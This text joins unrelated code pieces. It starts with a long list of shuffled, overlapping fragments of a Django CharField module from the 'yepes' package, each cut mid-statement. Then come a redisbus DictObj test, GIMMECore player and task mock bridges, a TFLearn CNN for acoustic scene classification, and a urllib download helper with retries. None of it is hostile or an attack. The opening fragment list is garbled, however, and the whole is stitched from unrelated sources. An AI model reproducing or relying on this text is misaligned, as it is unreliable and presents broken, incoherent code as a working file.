"kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs)",
"] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args,",
"unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db import models",
"= kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args,",
"if not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value",
"checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self,",
"False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is",
"import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db import",
"self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute =",
"import checks from django.core.validators import MinLengthValidator from django.db import models from django.utils import",
"None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False,",
"is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs):",
"False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs)",
"def to_python(self, value): if value is None: return value if not isinstance(value, six.string_types):",
"= ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value",
"path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={",
"[ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111',",
"from django.core import checks from django.core.validators import MinLengthValidator from django.db import models from",
") ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length'",
"**kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False)",
"checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', )",
"params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper,",
"return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset",
"must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif",
"coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from django.core.validators import",
"to_python(self, value): if value is None: return value if not isinstance(value, six.string_types): value",
"force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated",
"CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None)",
"not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors",
"(isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater",
"kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length',",
"self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii: value =",
"= super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path,",
"yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self,",
"integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if",
"= _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii',",
"False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path,",
"self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField,",
"self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value):",
"= check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path =",
"formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower,",
"unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper() return value",
"import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length,",
"= path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper':",
"as _ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import",
"True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None:",
"self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces,",
"force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if",
"return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value =",
"value = value.strip() if not value: return value if self.force_ascii: value = unidecode(value)",
"ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils",
"from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes import",
"kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces',",
"is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return",
"kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces',",
"super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False,",
"value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return",
"[] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length'",
"yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct",
"# -*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from",
"kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not",
"kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper',",
"False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False)",
"django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField",
"import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs):",
"kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None,",
"[] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset =",
"def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower':",
"*args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower',",
"-*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from django.core.validators",
"'.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii:",
"None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False)",
"obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [",
"from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def",
"kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii,",
"is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return",
"from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and",
"hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class",
"None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute",
"import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from",
"(name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset':",
"is None: return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces:",
"def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute",
"'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length':",
"from django.db import models from django.utils import six from django.utils.encoding import force_text from",
"django.core import checks from django.core.validators import MinLengthValidator from django.db import models from django.utils",
"self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length",
"'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, }",
"return (name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField,",
"self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField,",
"value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper:",
"else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif",
"value): if value is None: return value if not isinstance(value, six.string_types): value =",
"forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length,",
"if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split())",
"self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or a positive",
"unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if",
"_check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path",
"'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces':",
"[ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112',",
"_ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode",
"__future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db",
"self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or",
"forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords",
"self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs",
"self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField,",
"[ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\",",
"self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs)",
"'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def",
"django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _",
"if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def",
"six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes",
"models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii",
"if value is None: return value if not isinstance(value, six.string_types): value = force_text(value)",
"return [ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self,",
"errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct()",
"self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces",
"None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length'",
"'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if",
"id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error(",
"if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)):",
"False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None)",
"models from django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy",
"self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def",
"self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self,",
"\"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ]",
"positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length <",
"if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value",
") ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self,",
"None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self,",
"check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or",
"< self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length'",
"class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset',",
"(self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return",
"super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value if not",
"else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs):",
"'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self,",
"return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not",
"= unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper() return",
"path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False,",
"'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, })",
"from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from",
"six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or",
"self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value =",
"_('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False)",
"import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import",
"**kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset))",
"django.core.validators import MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding"
] |
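Given the field above, a model opts into normalization and casing at declaration time, and to_python() is what applies the transformations. Below is a minimal, hypothetical sketch; the model name and field options are assumptions for illustration, not taken from the source, though the yepes.fields import path matches what deconstruct() produces.

# Hypothetical model using the CharField above; assumes a Django project
# with the yepes app installed.
from django.db import models
from yepes.fields import CharField

class Coupon(models.Model):
    code = CharField(
        max_length=12,
        min_length=4,           # enforced by MinLengthValidator; misconfiguration is flagged as yepes.E112/E113
        force_ascii=True,       # transliterated through unidecode()
        force_upper=True,       # uppercased in to_python()
        normalize_spaces=True,  # runs of whitespace collapse to single spaces
    )

# to_python() applies the declared transformations in order, e.g.:
#   Coupon._meta.get_field('code').to_python('  héllo   wörld  ')
#   -> 'HELLO WORLD'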
Test for redisbus.utility.DictObj:

from redisbus.utility import DictObj


def test_dictobj():
    subject_dict = {
        "foo": "bar",
        "left": "right"
    }
    subject_obj = DictObj(subject_dict)

    assert hasattr(subject_obj, 'foo')
    assert hasattr(subject_obj, 'left')
    assert subject_obj.foo == "bar"
    assert subject_obj.left == "right"
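The test pins down only attribute-style access over the wrapped dict. A minimal sketch that would satisfy it is below; the real redisbus.utility.DictObj may do more (nested dicts, key sanitization), so treat this as an assumption rather than the library's implementation.

class DictObj(object):
    """Sketch: expose a dict's keys as instance attributes (not the real class)."""

    def __init__(self, source):
        # Copy each key/value pair onto the instance namespace.
        for key, value in source.items():
            setattr(self, key, value)

With this in place, DictObj({"foo": "bar"}).foo == "bar" holds, which is exactly what test_dictobj asserts.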
pedro19v/GIMME, examples/ModelMocks.py:

from GIMMECore import TaskModelBridge
from GIMMECore import PlayerModelBridge


class PlayerModelMock(object):
    def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
        self.currState = currState
        self.id = id
        self.name = name
        self.pastModelIncreasesGrid = pastModelIncreasesGrid
        # self.preferencesEst = preferencesEst.normalized()
        # self.realPreferences = realPreferences.normalized()
        self.baseLearningRate = None


class TaskModelMock(object):
    def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
        self.id = id
        self.description = description
        self.minRequiredAbility = minRequiredAbility
        self.profile = profile
        self.difficultyWeight = difficultyWeight
        self.profileWeight = profileWeight
        self.minDuration = minDuration


class CustomTaskModelBridge(TaskModelBridge):
    def __init__(self, tasks):
        self.tasks = tasks
        self.numTasks = len(tasks)

    def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
        self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight)

    def getAllTaskIds(self):
        return [int(i) for i in range(self.numTasks)]

    def getTaskInteractionsProfile(self, taskId):
        return self.tasks[taskId].profile

    def getMinTaskRequiredAbility(self, taskId):
        return self.tasks[taskId].minRequiredAbility

    def getMinTaskDuration(self, taskId):
        return self.tasks[taskId].minDuration

    def getTaskDifficultyWeight(self, taskId):
        return self.tasks[taskId].difficultyWeight

    def getTaskProfileWeight(self, taskId):
        return self.tasks[taskId].profileWeight

    def getTaskInitDate(self, taskId):
        return self.tasks[taskId].initDate

    def getTaskFinalDate(self, taskId):
        return self.tasks[taskId].finalDate


class CustomPlayerModelBridge(PlayerModelBridge):
    def __init__(self, players):
        self.players = players
        self.numPlayers = len(players)

    def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
        self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences)

    def resetPlayer(self, playerId):
        self.players[int(playerId)].currState.reset()
        self.players[int(playerId)].pastModelIncreasesGrid.reset()

    def resetState(self, playerId):
        self.players[int(playerId)].currState.reset()

    def setAndSavePlayerStateToGrid(self, playerId, increases, newState):
        self.players[int(playerId)].currState = newState
        self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases)

    def setBaseLearningRate(self, playerId, blr):
        self.players[int(playerId)].baseLearningRate = blr

    def getBaseLearningRate(self, playerId):
        return self.players[int(playerId)].baseLearningRate

    def getAllPlayerIds(self):
        return [int(i) for i in range(self.numPlayers)]

    def getPlayerName(self, playerId):
        return self.players[int(playerId)].name

    def getPlayerCurrState(self, playerId):
        return self.players[int(playerId)].currState

    def getPlayerCurrProfile(self, playerId):
        return self.players[int(playerId)].currState.profile

    def getPlayerStatesDataFrame(self, playerId):
        return self.players[int(playerId)].pastModelIncreasesGrid

    def getPlayerCurrCharacteristics(self, playerId):
        return self.players[int(playerId)].currState.characteristics

    def getPlayerPreferencesEst(self, playerId):
        return self.players[int(playerId)].preferencesEst

    def setPlayerPreferencesEst(self, playerId, preferencesEst):
        self.players[int(playerId)].preferencesEst = preferencesEst

    def setPlayerCharacteristics(self, playerId, characteristics):
        self.players[int(playerId)].currState.characteristics = characteristics

    def setPlayerProfile(self, playerId, profile):
        self.players[int(playerId)].currState.profile = profile

    def setPlayerGroup(self, playerId, group):
        self.players[int(playerId)].currState.group = group

    def setPlayerTasks(self, playerId, tasks):
        self.players[int(playerId)].currState.tasks = tasks

    def setPlayerRealPreferences(self, playerId, realPreferences):
        self.players[int(playerId)].realPreferences = realPreferences

    def getPlayerRealPreferences(self, playerId):
        return self.players[int(playerId)].realPreferences
"self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self,",
"self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences =",
"preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id,",
"preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self,",
"realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId):",
"= profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks",
"self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId,",
"newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def",
"name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate",
"playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId,",
"def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id",
"= id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() #",
"playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile",
"= realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile,",
"self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId]",
"minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self,",
"self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState",
"self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks ="
] |
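A quick usage sketch for the task bridge above. This is not part of the original file: the task description, profile string, weights, and duration are made-up placeholder values, and it assumes GIMMECore is installed so that TaskModelBridge imports and needs no further setup.

# Usage sketch (illustrative only; all concrete values are assumptions).
tasks = {}
taskBridge = CustomTaskModelBridge(tasks)
taskBridge.registerNewTask(0, "collect samples", minRequiredAbility=0.5,
                           profile="placeholder-interactions-profile", minDuration=5,
                           difficultyWeight=0.6, profileWeight=0.4)
taskBridge.numTasks = len(tasks)  # registerNewTask stores the task but does not grow numTasks itself
assert taskBridge.getAllTaskIds() == [0]
assert taskBridge.getMinTaskDuration(0) == 5
assert taskBridge.getTaskDifficultyWeight(0) == 0.6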
<reponame>chatdip98/Acoustic-Scene-Classification
#----convolutional neural network for classification------
#importing required libraries and modules
import os
import numpy as np
import tensorflow as tf
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression


class CNN():
    datasize = 'full'

    def __init__(self):
        #constructor
        pass

    def create_1ConvModel(self):
        #creating the CNN model as per the architecture followed with 4-conv and pooling layers
        self.convnet = input_data(shape=[None, 128, 431, 1], name='input')
        self.convnet = conv_2d(self.convnet, 32, 5, activation='relu')
        self.convnet = max_pool_2d(self.convnet, 3)
        self.convnet = conv_2d(self.convnet, 64, 5, activation='relu')
        self.convnet = max_pool_2d(self.convnet, 3)
        self.convnet = conv_2d(self.convnet, 128, 5, activation='relu')
        self.convnet = max_pool_2d(self.convnet, 3)
        self.convnet = conv_2d(self.convnet, 256, 5, activation='relu')
        self.convnet = max_pool_2d(self.convnet, 3)
        self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet)
        self.convnet = fully_connected(self.convnet, 1024, activation='relu')
        #self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting
        self.convnet = fully_connected(self.convnet, 15, activation='softmax')
        self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01,
                                  loss='categorical_crossentropy', name='targets')
        self.model = tflearn.DNN(self.convnet)
        return self.model

    def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val):
        #training the created model with data from the user
        #here stochastic learning is deployed since the input data is not too high; minibatch_size=1
        self.epoch = 10  #set the number of epochs
        model.fit({'input': X_train}, {'targets': Y_train}, n_epoch=self.epoch,
                  validation_set=({'input': X_val}, {'targets': Y_val}),
                  show_metric=True, run_id='DCNet')
        model.save('DNN/'+CNN.datasize+'/'+arg+'.model')
        #saving the model in the DNN/full folder, 3 files will be created for each model
        return model

    def predict_test_data(self, arg, model, X_test, Y_test):
        self.ans = []
        count = 0
        for i in range(len(X_test)):
            self.pr = model.predict([X_test[i]])[0]
            self.ans.append(self.pr)
            if np.array_equal(np.round(self.pr).astype(int), Y_test[i]):
                count += 1
        print(arg, "Test Accuracy = ", (count/len(X_test))*100, "%")
        #calculating test accuracy for each classifier
        #saving the softmax outputs for using them later for calculating the ensemble accuracy
        np.save('test_prediction/full/'+arg+'.npy', np.array(self.ans))
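A standalone shape sketch for the network above, added here for clarity and not taken from the repository: it builds dummy arrays matching the declared input_data shape. Reading the 128x431 single-channel inputs as spectrogram-like audio features is an assumption, as are the commented-out smoke-test calls.

import numpy as np

# Shape sketch (assumption: 128x431 single-channel inputs, e.g. spectrogram-like
# features; 15 output classes, matching the softmax layer above).
X_dummy = np.zeros((4, 128, 431, 1), dtype=np.float32)  # 4 fake examples
Y_dummy = np.zeros((4, 15), dtype=np.float32)           # 15-way one-hot targets
Y_dummy[:, 0] = 1.0

# With tflearn/TF1 installed, the model could then be smoke-tested as:
# cnn = CNN()
# model = cnn.create_1ConvModel()
# cnn.train_1ConvModel('smoke', model, X_dummy, Y_dummy, X_dummy, Y_dummy)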
# -*- coding: utf-8 -*-
# @Time    : 2019/4/22 14:57
# @Author  : hyy
# @Email   : <EMAIL>
# @File    : lea_1.py
# @Software: PyCharm
import urllib.request


def download(url, num_retries=2):
    print('Downloading:', url)
    headers = {'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'}
    request = urllib.request.Request(url, headers=headers)
    try:
        html = urllib.request.urlopen(request).read()
    except urllib.request.URLError as e:
        print('Download error:', e.reason)
        html = None
        if num_retries > 0:
            if hasattr(e, 'code') and 500 <= e.code < 600:
                return download(url, num_retries-1)
    return html


if __name__ == '__main__':
    html = download('http://httpstat.us/500')
